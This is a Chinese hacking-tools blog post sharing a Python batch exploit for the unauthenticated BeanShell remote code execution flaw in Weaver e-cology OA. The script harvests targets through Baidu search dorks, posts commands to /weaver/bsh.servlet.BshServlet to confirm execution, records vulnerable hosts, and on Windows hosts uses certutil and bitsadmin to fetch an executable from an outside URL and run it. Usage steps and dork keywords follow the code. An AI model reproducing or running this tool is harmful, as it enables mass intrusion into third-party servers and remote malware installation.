您现在的位置是:网站首页> 网络安全 神兵利器
泛微oa 远程代码执行批量脚本
exploit2019-11-05 10:41:34【神兵利器】人已围观
简介泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。
分享一个泛微oa 远程代码执行批量脚本。
import requests
import re
from lxml import etree
from urllib.parse import urlparse
from multiprocessing.dummy import Pool, Lock
import urllib3
urllib3.disable_warnings()
# windows 系统 不能用 就改成 http 不要用https的
BAIDU_API = 'https://www.baidu.com/s?wd=%s&pn=%d'
PAGE = 10
lock = Lock()
CACHE = []
EXE_PATH = 'C:/c.exe' # 下载到什么位置.
EXE_URL = 'http://xxxx.xxxx.xxxxx/xxxx.xxx' # 程序下载地址.
EXE_ARGV = 'xxxx xxx xxx' # 执行EXE需要用到的参数
IS_EXEC = True # 是否执行exe. 真为执行exe 将自动下载exe程序 并执行. 为假只验证操作系统版本. 并写入相关文件
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36'
}
payload1 = { # 验证操作系统
'bsh.script': 'exec("uname -a");',
'bsh.servlet.captureOutErr': 'true',
'bsh.servlet.output': 'raw',
'bsh.servlet.captureOutErr': 'true',
'bsh.servlet.output': 'raw'
}
def downloads(url):
try:
return requests.get(url, headers=headers, timeout=10)
except Exception as e:
print('[-] 网络请求异常 %s' % e.args)
return None
def windows_exec(url):
# download file
download = payload1['bsh.script'] = 'exec("certutil -urlcache -split -f %s %s");' % (
EXE_URL, EXE_PATH)
# download file
download1 = payload1['bsh.script'] = 'bitsadmin /transfer n %s %s' % (
EXE_URL, EXE_PATH)
# 执行文件
_exec = payload1['bsh.script'] = 'exec("%s %s");' % (EXE_PATH, EXE_ARGV)
print(_exec)
try:
print('[+] %s 使用第一种方式 下载文件中' % url)
resp = requests.post(url, data=download, verify=False,
timeout=120) # 使用第一种下载文件. 确保文件能下载成功
# 使用第二种下载文件.
print('[+] %s 使用第二种方式 下载文件中' % url)
resp = requests.post(url, data=download1, verify=False, timeout=120)
print('[+] %s 执行文件中' % url)
resp = requests.post(url, data=_exec, verify=False, timeout=10) # 执行文件
except Exception as e:
return
def parse_baidu_html(html: str):
result = []
for i in re.findall('class="c-showurl" style="text-decoration:none;">(.*?)</a>', html):
i = i.replace(' ', '')
i = i.replace('<b>', '')
i = i.replace('</b>', '')
if not (i.startswith('http://') or i.startswith('https://')):
i = 'http://%s' % i
url = urlparse(i).netloc
if url in CACHE:
print('[-] 重复站点已经过滤 %s' % url)
continue
CACHE.append(url)
result.append(url)
return result
def exp(url):
payload = '/weaver/bsh.servlet.BshServlet'
url = 'http://%s%s' % (url, payload)
try:
resp = requests.post(url, data=payload1, verify=False)
except Exception:
print('[-] 网络请求异常 %s' % url)
return
if resp.status_code != 200:
print('[-] 状态异常 已跳过检查 %s %d' % (url, resp.status_code))
return
html = resp.text.lower()
if 'linux' in html:
print('[+] 存在任意执行漏洞: %s 操作系统为Linux' % url)
with lock:
with open('linux.txt', 'a', encoding='gbk') as _file:
_file.write(url + '\n')
elif 'uname' in html:
print('[+] 存在任意执行漏洞: %s 操作系统为 Windows' % url)
with lock:
with open('windows.txt', 'a', encoding='gbk') as _file:
_file.write(url + '\n')
if IS_EXEC:
windows_exec(url)
# else: # Debug
# print(url)
# print(html)
def work_in(data: tuple):
keyword, page = data
target = BAIDU_API % (keyword, page * 10)
resp = downloads(target)
if resp is None:
return
targets = parse_baidu_html(resp.text)
print('[+] 查询 [%s] 关键字中, 第%d页, 获取到%d个站点' % (keyword, page, len(targets)))
return targets
if __name__ == "__main__":
targats = []
with open('keys.txt', 'r', encoding='gbk') as _file:
for key in _file.readlines():
for i in range(PAGE):
result = work_in((key.strip(), i))
if result is None:
continue
targats += result
pool = Pool(10)
pool.map(exp, targats)
pool.close()
pool.join()
使用方法:同级目录下新建keys.txt
内容为关键字:
intitle:泛微协同商务
inurl:/login/Login.jsp?logintype=1
很赞哦!()
上一篇:hydra 一款实用的破解工具
